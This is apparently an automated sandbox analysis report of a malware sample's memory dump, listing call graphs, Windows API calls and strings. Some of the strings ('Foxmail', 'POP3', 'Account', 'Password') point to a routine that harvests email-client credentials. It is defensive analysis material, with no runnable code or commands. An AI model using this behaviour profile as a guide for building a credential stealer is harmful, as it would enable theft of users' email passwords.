2090858b 7021->7027 7022 20906368 _free 20 API calls 7023 2090857a 7022->7023 7025 209062ac _abort 26 API calls 7023->7025 7024->7022 7024->7026 7025->7026 7026->7001 7027->7026 7028 20906368 _free 20 API calls 7027->7028 7028->7023 7030 209067a4 7029->7030 7031 209067b4 7030->7031 7033 2090571e _free 20 API calls 7030->7033 7032 2090571e _free 20 API calls 7031->7032 7034 209067bb 7032->7034 7033->7030 7034->6996 7131 20905630 7132 2090563b 7131->7132 7133 20905eb7 11 API calls 7132->7133 7134 20905664 7132->7134 7135 20905660 7132->7135 7133->7132 7137 20905688 7134->7137 7138 209056b4 7137->7138 7139 20905695 7137->7139 7138->7135 7140 2090569f RtlDeleteCriticalSection 7139->7140 7140->7138 7140->7140 7739 20903370 7750 20903330 7739->7750 7751 20903342 7750->7751 7752 2090334f 7750->7752 7753 20902ada _ValidateLocalCookies 5 API calls 7751->7753 7753->7752 7754 20909e71 7755 20909e95 7754->7755 7756 20909ee6 7755->7756 7759 20909f71 __startOneArgErrorHandling 7755->7759 7757 20909ef8 7756->7757 7758 2090aa53 21 API calls 7756->7758 7758->7757 7761 2090acad __startOneArgErrorHandling 7759->7761 7762 2090b2f0 7759->7762 7763 2090b329 __startOneArgErrorHandling 7762->7763 7764 2090b5c1 __raise_exc RaiseException 7763->7764 7765 2090b350 __startOneArgErrorHandling 7763->7765 7764->7765 7766 2090b393 7765->7766 7767 2090b36e 7765->7767 7768 2090b8b2 __startOneArgErrorHandling 20 API calls 7766->7768 7773 2090b8e1 7767->7773 7770 2090b38e __startOneArgErrorHandling 7768->7770 7771 20902ada _ValidateLocalCookies 5 API calls 7770->7771 7772 2090b3b7 7771->7772 7772->7761 7774 2090b8f0 7773->7774 7775 2090b964 __startOneArgErrorHandling 7774->7775 7776 2090b90f __startOneArgErrorHandling 7774->7776 7778 2090b8b2 __startOneArgErrorHandling 20 API calls 7775->7778 7777 209078a3 __startOneArgErrorHandling 5 API calls 7776->7777 7779 2090b950 7777->7779 7781 2090b95d 7778->7781 7780 2090b8b2 __startOneArgErrorHandling 20 API calls 7779->7780 7779->7781 7780->7781 7781->7770 6571 20903eb3 6572 20905411 38 API calls 6571->6572 6573 20903ebb 6572->6573 7141 2090543d 7142 20905440 7141->7142 7143 209055a8 _abort 38 API calls 7142->7143 7144 2090544c 7143->7144 6574 209067bf 6579 209067f4 6574->6579 6577 209067db 6578 2090571e _free 20 API calls 6578->6577 6580 20906806 6579->6580 6589 209067cd 6579->6589 6581 20906836 6580->6581 6582 2090680b 6580->6582 6581->6589 6590 209071d6 6581->6590 6583 2090637b _abort 20 API calls 6582->6583 6585 20906814 6583->6585 6587 2090571e _free 20 API calls 6585->6587 6586 20906851 6588 2090571e _free 20 API calls 6586->6588 6587->6589 6588->6589 6589->6577 6589->6578 6591 209071e1 6590->6591 6592 20907209 6591->6592 6593 209071fa 6591->6593 6594 20907218 6592->6594 6599 20908a98 6592->6599 6595 20906368 _free 20 API calls 6593->6595 6606 20908acb 6594->6606 6598 209071ff ___scrt_fastfail 6595->6598 6598->6586 6600 20908aa3 6599->6600 6601 20908ab8 RtlSizeHeap 6599->6601 6602 20906368 _free 20 API calls 6600->6602 6601->6594 6603 20908aa8 6602->6603 6604 209062ac _abort 26 API calls 6603->6604 6605 20908ab3 6604->6605 6605->6594 6607 20908ae3 6606->6607 6608 20908ad8 6606->6608 6610 20908aeb 6607->6610 6616 20908af4 _abort 6607->6616 6609 209056d0 21 API calls 6608->6609 6614 20908ae0 6609->6614 6611 2090571e _free 20 API calls 6610->6611 6611->6614 6612 20908af9 6615 20906368 _free 20 API calls 6612->6615 6613 20908b1e RtlReAllocateHeap 6613->6614 6613->6616 6614->6598 6615->6614 6616->6612 6616->6613 6617 2090474f _abort 7 API calls 6616->6617 6617->6616 7035 20905bff 7043 20905d5c 7035->7043 7038 20905b7a _abort 20 API calls 7040 20905c1b 7038->7040 7039 20905c28 7040->7039 7050 20905c2b 7040->7050 7042 20905c13 7044 20905c45 _abort 5 API calls 7043->7044 7045 20905d83 7044->7045 7046 20905d9b TlsAlloc 7045->7046 7047 20905d8c 7045->7047 7046->7047 7048 20902ada _ValidateLocalCookies 5 API calls 7047->7048 7049 20905c09 7048->7049 7049->7038 7049->7042 7051 20905c3b 7050->7051 7052 20905c35 7050->7052 7051->7042 7054 20905db2 7052->7054 7055 20905c45 _abort 5 API calls 7054->7055 7056 20905dd9 7055->7056 7057 20905df1 TlsFree 7056->7057 7058 20905de5 7056->7058 7057->7058 7059 20902ada _ValidateLocalCookies 5 API calls 7058->7059 7060 20905e02 7059->7060 7060->7051 7145 20901f3f 7146 20901f4b ___scrt_is_nonwritable_in_current_image 7145->7146 7163 2090247c 7146->7163 7148 20901f52 7149 20902041 7148->7149 7150 20901f7c 7148->7150 7157 20901f57 ___scrt_is_nonwritable_in_current_image 7148->7157 7186 20902639 IsProcessorFeaturePresent 7149->7186 7174 209023de 7150->7174 7153 20902048 7154 20901f8b __RTC_Initialize 7154->7157 7177 209022fc RtlInitializeSListHead 7154->7177 7156 20901f99 ___scrt_initialize_default_local_stdio_options 7178 209046c5 7156->7178 7161 20901fb8 7161->7157 7162 20904669 _abort 5 API calls 7161->7162 7162->7157 7164 20902485 7163->7164 7190 20902933 IsProcessorFeaturePresent 7164->7190 7168 20902496 7173 2090249a 7168->7173 7201 209053c8 7168->7201 7171 209024b1 7171->7148 7173->7148 7257 209024b5 7174->7257 7176 209023e5 7176->7154 7177->7156 7181 209046dc 7178->7181 7179 20902ada _ValidateLocalCookies 5 API calls 7180 20901fad 7179->7180 7180->7157 7182 209023b3 7180->7182 7181->7179 7183 209023b8 ___scrt_release_startup_lock 7182->7183 7184 20902933 ___isa_available_init IsProcessorFeaturePresent 7183->7184 7185 209023c1 7183->7185 7184->7185 7185->7161 7187 2090264e ___scrt_fastfail 7186->7187 7188 209026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7187->7188 7189 20902744 ___scrt_fastfail 7188->7189 7189->7153 7191 20902491 7190->7191 7192 209034ea 7191->7192 7193 209034ef ___vcrt_initialize_winapi_thunks 7192->7193 7212 20903936 7193->7212 7196 209034fd 7196->7168 7198 20903505 7199 20903510 7198->7199 7226 20903972 7198->7226 7199->7168 7249 20907457 7201->7249 7204 20903529 7205 20903532 7204->7205 7206 20903543 7204->7206 7207 2090391b ___vcrt_uninitialize_ptd 6 API calls 7205->7207 7206->7173 7208 20903537 7207->7208 7209 20903972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7208->7209 7210 2090353c 7209->7210 7253 20903c50 7210->7253 7214 2090393f 7212->7214 7215 20903968 7214->7215 7217 209034f9 7214->7217 7230 20903be0 7214->7230 7216 20903972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7215->7216 7216->7217 7217->7196 7218 209038e8 7217->7218 7235 20903af1 7218->7235 7221 209038fd 7221->7198 7222 20903ba2 ___vcrt_FlsSetValue 6 API calls 7223 2090390b 7222->7223 7224 20903918 7223->7224 7240 2090391b 7223->7240 7224->7198 7227 2090399c 7226->7227 7228 2090397d 7226->7228 7227->7196 7229 20903987 RtlDeleteCriticalSection 7228->7229 7229->7227 7229->7229 7231 20903a82 try_get_function 5 API calls 7230->7231 7232 20903bfa 7231->7232 7233 20903c18 InitializeCriticalSectionAndSpinCount 7232->7233 7234 20903c03 7232->7234 7233->7234 7234->7214 7236 20903a82 try_get_function 5 API calls 7235->7236 7237 20903b0b 7236->7237 7238 20903b24 TlsAlloc 7237->7238 7239 209038f2 7237->7239 7239->7221 7239->7222 7241 20903925 7240->7241 7243 2090392b 7240->7243 7244 20903b2c 7241->7244 7243->7221 7245 20903a82 try_get_function 5 API calls 7244->7245 7246 20903b46 7245->7246 7247 20903b5e TlsFree 7246->7247 7248 20903b52 7246->7248 7247->7248 7248->7243 7252 20907470 7249->7252 7250 20902ada _ValidateLocalCookies 5 API calls 7251 209024a3 7250->7251 7251->7171 7251->7204 7252->7250 7254 20903c7f 7253->7254 7255 20903c59 7253->7255 7254->7206 7255->7254 7256 20903c69 FreeLibrary 7255->7256 7256->7255 7258 209024c4 7257->7258 7259 209024c8 7257->7259 7258->7176 7260 20902639 ___scrt_fastfail 4 API calls 7259->7260 7262 209024d5 ___scrt_release_startup_lock 7259->7262 7261 20902559 7260->7261 7262->7176 6618 209081a0 6619 209081d9 6618->6619 6620 209081dd 6619->6620 6629 20908205 6619->6629 6621 20906368 _free 20 API calls 6620->6621 6622 209081e2 6621->6622 6624 209062ac _abort 26 API calls 6622->6624 6623 20908529 6625 20902ada _ValidateLocalCookies 5 API calls 6623->6625 6626 209081ed 6624->6626 6627 20908536 6625->6627 6628 20902ada _ValidateLocalCookies 5 API calls 6626->6628 6630 209081f9 6628->6630 6629->6623 6632 209080c0 6629->6632 6635 209080db 6632->6635 6633 20902ada _ValidateLocalCookies 5 API calls 6634 20908152 6633->6634 6634->6629 6635->6633 7061 2090a1e0 7064 2090a1fe 7061->7064 7063 2090a1f6 7065 2090a203 7064->7065 7068 2090a298 7065->7068 7069 2090aa53 7065->7069 7068->7063 7070 2090aa80 7069->7070 7071 2090aa70 RtlDecodePointer 7069->7071 7072 2090ab02 7070->7072 7075 2090ab0d 7070->7075 7077 2090aab7 7070->7077 7071->7070 7073 20902ada _ValidateLocalCookies 5 API calls 7072->7073 7074 2090a42f 7073->7074 7074->7063 7075->7072 7076 20906368 _free 20 API calls 7075->7076 7076->7072 7077->7072 7078 20906368 _free 20 API calls 7077->7078 7078->7072 7782 20907260 GetStartupInfoW 7783 20907286 7782->7783 7784 20907318 7782->7784 7783->7784 7785 20908be3 27 API calls 7783->7785 7786 209072af 7785->7786 7786->7784 7787 209072dd GetFileType 7786->7787 7787->7786 6636 209021a1 ___scrt_dllmain_exception_filter 7788 20909d61 7789 20909d81 7788->7789 7792 20909db8 7789->7792 7791 20909dab 7793 20909dbf 7792->7793 7794 20909e20 7793->7794 7798 20909ddf 7793->7798 7795 2090aa17 21 API calls 7794->7795 7796 2090a90e 7794->7796 7797 20909e6e 7795->7797 7796->7791 7797->7791 7798->7796 7799 2090aa17 21 API calls 7798->7799 7800 2090a93e 7799->7800 7800->7791 6637 2090c7a7 6638 2090c7be 6637->6638 6644 2090c80d 6637->6644 6638->6644 6646 2090c7e6 GetModuleHandleA 6638->6646 6639 2090c872 6640 2090c835 GetModuleHandleA 6640->6644 6643 2090c85f GetProcAddress 6643->6644 6644->6639 6644->6640 6644->6643 6647 2090c7ef 6646->6647 6653 2090c80d 6646->6653 6655 2090c803 GetProcAddress 6647->6655 6650 2090c872 6651 2090c835 GetModuleHandleA 6651->6653 6653->6650 6653->6651 6654 2090c85f GetProcAddress 6653->6654 6654->6653 6659 2090c80d 6655->6659 6656 2090c872 6657 2090c835 GetModuleHandleA 6657->6659 6658 2090c85f GetProcAddress 6658->6659 6659->6656 6659->6657 6659->6658 7263 2090742b 7264 20907430 7263->7264 7266 20907453 7264->7266 7267 20908bae 7264->7267 7268 20908bdd 7267->7268 7269 20908bbb 7267->7269 7268->7264 7270 20908bd7 7269->7270 7271 20908bc9 RtlDeleteCriticalSection 7269->7271 7272 2090571e _free 20 API calls 7270->7272 7271->7270 7271->7271 7272->7268 7801 2090ac6b 7802 2090ac84 __startOneArgErrorHandling 7801->7802 7803 2090b2f0 21 API calls 7802->7803 7804 2090acad __startOneArgErrorHandling 7802->7804 7803->7804 6660 209060ac 6661 209060dd 6660->6661 6663 209060b7 6660->6663 6662 209060c7 FreeLibrary 6662->6663 6663->6661 6663->6662 7805 2090506f 7806 20905081 7805->7806 7807 20905087 7805->7807 7808 20905000 20 API calls 7806->7808 7808->7807

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 20901137
                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 20901151
                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2090115C
                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2090116D
                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2090117C
                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 20901193
                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 209011D0
                                                                                          • FindClose.KERNEL32(00000000), ref: 209011DB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                          • String ID:
                                                                                          • API String ID: 1083526818-0
                                                                                          • Opcode ID: 5c2d27a693ed7b6570af6902961e3141c2f67ea2ea53f4601af3cead949a3b57
                                                                                          • Instruction ID: acfd278a3d6bea946dcbabe7f33051063740a5419422c95847500f6a5b6d4afb
                                                                                          • Opcode Fuzzy Hash: 5c2d27a693ed7b6570af6902961e3141c2f67ea2ea53f4601af3cead949a3b57
                                                                                          • Instruction Fuzzy Hash: 6B21A5715083186BD714EBA49C49F9B7BEDEF84314F00092AFA99D3190E735D6448BD6

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 20901434
                                                                                            • Part of subcall function 209010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 20901137
                                                                                            • Part of subcall function 209010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 20901151
                                                                                            • Part of subcall function 209010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2090115C
                                                                                            • Part of subcall function 209010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2090116D
                                                                                            • Part of subcall function 209010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2090117C
                                                                                            • Part of subcall function 209010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 20901193
                                                                                            • Part of subcall function 209010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 209011D0
                                                                                            • Part of subcall function 209010F1: FindClose.KERNEL32(00000000), ref: 209011DB
                                                                                          • lstrlenW.KERNEL32(?), ref: 209014C5
                                                                                          • lstrlenW.KERNEL32(?), ref: 209014E0
                                                                                          • lstrlenW.KERNEL32(?,?), ref: 2090150F
                                                                                          • lstrcatW.KERNEL32(00000000), ref: 20901521
                                                                                          • lstrlenW.KERNEL32(?,?), ref: 20901547
                                                                                          • lstrcatW.KERNEL32(00000000), ref: 20901553
                                                                                          • lstrlenW.KERNEL32(?,?), ref: 20901579
                                                                                          • lstrcatW.KERNEL32(00000000), ref: 20901585
                                                                                          • lstrlenW.KERNEL32(?,?), ref: 209015AB
                                                                                          • lstrcatW.KERNEL32(00000000), ref: 209015B7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                          • String ID: )$Foxmail$ProgramFiles
                                                                                          • API String ID: 672098462-2938083778
                                                                                          • Opcode ID: 6c4571c1d11d6a01b733bc0e16af5d08972846fa79cb3aea29d50287de6afcbd
                                                                                          • Instruction ID: 5da7ca8c3f9caa0636ddf3329b758cf2a89b903a7d994f6e056937c2528a1462
                                                                                          • Opcode Fuzzy Hash: 6c4571c1d11d6a01b733bc0e16af5d08972846fa79cb3aea29d50287de6afcbd
                                                                                          • Instruction Fuzzy Hash: 2E818171A4036CA9EB20DBE09C86FEE7379EF84714F00059AF609E7190EA715A84CF95
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 209061DA
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 209061E4
                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 209061F1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                          • String ID:
                                                                                          • API String ID: 3906539128-0
                                                                                          • Opcode ID: 879bc77ea7f47aec8f7a599776f7a6c1315bef9791b1d91ea842cef4a248097a
                                                                                          • Instruction ID: 6954a897c323dedd4a8e581ccd5b1c915f44c58aec53a10fd31a01d4f993983b
                                                                                          • Opcode Fuzzy Hash: 879bc77ea7f47aec8f7a599776f7a6c1315bef9791b1d91ea842cef4a248097a
                                                                                          • Instruction Fuzzy Hash: F831E57490122C9BDB21DF68DD8879DBBB9BF08310F5041DAE81DA7260E7749F818F45
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(?,?,20904A8A,?,20912238,0000000C,20904BBD,00000000,00000000,00000001,20902082,20912108,0000000C,20901F3A,?), ref: 20904AD5
                                                                                          • TerminateProcess.KERNEL32(00000000,?,20904A8A,?,20912238,0000000C,20904BBD,00000000,00000000,00000001,20902082,20912108,0000000C,20901F3A,?), ref: 20904ADC
                                                                                          • ExitProcess.KERNEL32 ref: 20904AEE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: ad9d353cd45d12b3710096f5c878ebd1d3003fc0647c03f1f50bb12dc730f15a
                                                                                          • Instruction ID: 1f8f3d6a95ed9d30cbb394e806bc2982994240c1bdd92eea52e8d2b65ce24174
                                                                                          • Opcode Fuzzy Hash: ad9d353cd45d12b3710096f5c878ebd1d3003fc0647c03f1f50bb12dc730f15a
                                                                                          • Instruction Fuzzy Hash: 23E0B676159608EFDF016FA9CD09B493B7FEF41741F508064FA0A8B121DB3ADD42EA54
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .
                                                                                          • API String ID: 0-248832578
                                                                                          • Opcode ID: 802d3407ae27aa4d0526f02c127ba5a5898fb9cb60f5629d4991ddb67ddf2591
                                                                                          • Instruction ID: e25a5da3d2fd7ebd75e52a834744c21eee06c117c4d839abeddd491ba93e89c4
                                                                                          • Opcode Fuzzy Hash: 802d3407ae27aa4d0526f02c127ba5a5898fb9cb60f5629d4991ddb67ddf2591
                                                                                          • Instruction Fuzzy Hash: 1531C472900229AFDB148FB8CC85EEA7BBEDB85314F1041ECF91AD7251E7319E458B60
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: HeapProcess
                                                                                          • String ID:
                                                                                          • API String ID: 54951025-0
                                                                                          • Opcode ID: 7e6d10aea618706f2ee6af864f98545cce043021053b86230c82e4a2cd2afcd7
                                                                                          • Instruction ID: 764f058d46113ba930c23b3ba21fe9571866195f7149b8c640b9eab54bf63468
                                                                                          • Opcode Fuzzy Hash: 7e6d10aea618706f2ee6af864f98545cce043021053b86230c82e4a2cd2afcd7
                                                                                          • Instruction Fuzzy Hash: 93A0123071D5028F57004F344A0920D35BD6D001807008014640EC0120E7288001B700

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 20901CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 20901D1B
                                                                                            • Part of subcall function 20901CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 20901D37
                                                                                            • Part of subcall function 20901CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20901D4B
                                                                                          • _strlen.LIBCMT ref: 20901855
                                                                                          • _strlen.LIBCMT ref: 20901869
                                                                                          • _strlen.LIBCMT ref: 2090188B
                                                                                          • _strlen.LIBCMT ref: 209018AE
                                                                                          • _strlen.LIBCMT ref: 209018C8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strlen$File$CopyCreateDelete
                                                                                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                          • API String ID: 3296212668-3023110444
                                                                                          • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                          • Instruction ID: 76f8646c954882d6eec731aa0fda385daf3cc2da258e5aa410cb197729771173
                                                                                          • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                          • Instruction Fuzzy Hash: C9612571D00218AFEF11CBE4D851BDEB7FBAF55300F004096E656AB290EB745A85CF92

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strlen
                                                                                          • String ID: %m$~$Gon~$~F@7$~dra
                                                                                          • API String ID: 4218353326-230879103
                                                                                          • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                          • Instruction ID: 555969df806ed91dbd87a1be0202bc7ab6dccd7bcfc7c298bae7a6f6088324a7
                                                                                          • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                          • Instruction Fuzzy Hash: CD71D2B1D002285BDF119BE49895BEF7BFEAF19340F1040D6E645E7241E6749B89CFA0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 203 20907cc2-20907cd6 204 20907d44-20907d4c 203->204 205 20907cd8-20907cdd 203->205 207 20907d93-20907dab call 20907e35 204->207 208 20907d4e-20907d51 204->208 205->204 206 20907cdf-20907ce4 205->206 206->204 209 20907ce6-20907ce9 206->209 218 20907dae-20907db5 207->218 208->207 211 20907d53-20907d90 call 2090571e * 4 208->211 209->204 213 20907ceb-20907cf3 209->213 211->207 216 20907cf5-20907cf8 213->216 217 20907d0d-20907d15 213->217 216->217 222 20907cfa-20907d0c call 2090571e call 209090ba 216->222 220 20907d17-20907d1a 217->220 221 20907d2f-20907d43 call 2090571e * 2 217->221 223 20907dd4-20907dd8 218->223 224 20907db7-20907dbb 218->224 220->221 226 20907d1c-20907d2e call 2090571e call 209091b8 220->226 221->204 222->217 227 20907df0-20907dfc 223->227 228 20907dda-20907ddf 223->228 231 20907dd1 224->231 232 20907dbd-20907dc0 224->232 226->221 227->218 238 20907dfe-20907e0b call 2090571e 227->238 235 20907de1-20907de4 228->235 236 20907ded 228->236 231->223 232->231 240 20907dc2-20907dd0 call 2090571e * 2 232->240 235->236 243 20907de6-20907dec call 2090571e 235->243 236->227 240->231 243->236
                                                                                          APIs
                                                                                          • ___free_lconv_mon.LIBCMT ref: 20907D06
                                                                                            • Part of subcall function 209090BA: _free.LIBCMT ref: 209090D7
                                                                                            • Part of subcall function 209090BA: _free.LIBCMT ref: 209090E9
                                                                                            • Part of subcall function 209090BA: _free.LIBCMT ref: 209090FB
                                                                                            • Part of subcall function 209090BA: _free.LIBCMT ref: 2090910D
                                                                                            • Part of subcall function 209090BA: _free.LIBCMT ref: 2090911F
                                                                                            • Part of subcall function 209090BA: _free.LIBCMT ref: 20909131
                                                                                            • Part of subcall function 209090BA: _free.LIBCMT ref: 20909143
                                                                                            • Part of subcall function 209090BA: _free.LIBCMT ref: 20909155
                                                                                            • Part of subcall function 209090BA: _free.LIBCMT ref: 20909167
                                                                                            • Part of subcall function 209090BA: _free.LIBCMT ref: 20909179
                                                                                            • Part of subcall function 209090BA: _free.LIBCMT ref: 2090918B
                                                                                            • Part of subcall function 209090BA: _free.LIBCMT ref: 2090919D
                                                                                            • Part of subcall function 209090BA: _free.LIBCMT ref: 209091AF
                                                                                          • _free.LIBCMT ref: 20907CFB
                                                                                            • Part of subcall function 2090571E: HeapFree.KERNEL32(00000000,00000000,?,2090924F,?,00000000,?,00000000,?,20909276,?,00000007,?,?,20907E5A,?), ref: 20905734
                                                                                            • Part of subcall function 2090571E: GetLastError.KERNEL32(?,?,2090924F,?,00000000,?,00000000,?,20909276,?,00000007,?,?,20907E5A,?,?), ref: 20905746
                                                                                          • _free.LIBCMT ref: 20907D1D
                                                                                          • _free.LIBCMT ref: 20907D32
                                                                                          • _free.LIBCMT ref: 20907D3D
                                                                                          • _free.LIBCMT ref: 20907D5F
                                                                                          • _free.LIBCMT ref: 20907D72
                                                                                          • _free.LIBCMT ref: 20907D80
                                                                                          • _free.LIBCMT ref: 20907D8B
                                                                                          • _free.LIBCMT ref: 20907DC3
                                                                                          • _free.LIBCMT ref: 20907DCA
                                                                                          • _free.LIBCMT ref: 20907DE7
                                                                                          • _free.LIBCMT ref: 20907DFF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                          • String ID:
                                                                                          • API String ID: 161543041-0
                                                                                          • Opcode ID: c764ceb9dbc66092f28394da14874039f84dc9ca17eb2c146defaa9b9f14b4a2
                                                                                          • Instruction ID: cec6fdda9f752909e98fd224ef66ab699158915ea5c5bade334c4ad44768914b
                                                                                          • Opcode Fuzzy Hash: c764ceb9dbc66092f28394da14874039f84dc9ca17eb2c146defaa9b9f14b4a2
                                                                                          • Instruction Fuzzy Hash: 11313E31A00245EFDB219BB9D985B67B7EFEF10260F104499E84BD7191DE32AD80DB14

                                                                                          Control-flow Graph

                                                                                          APIs
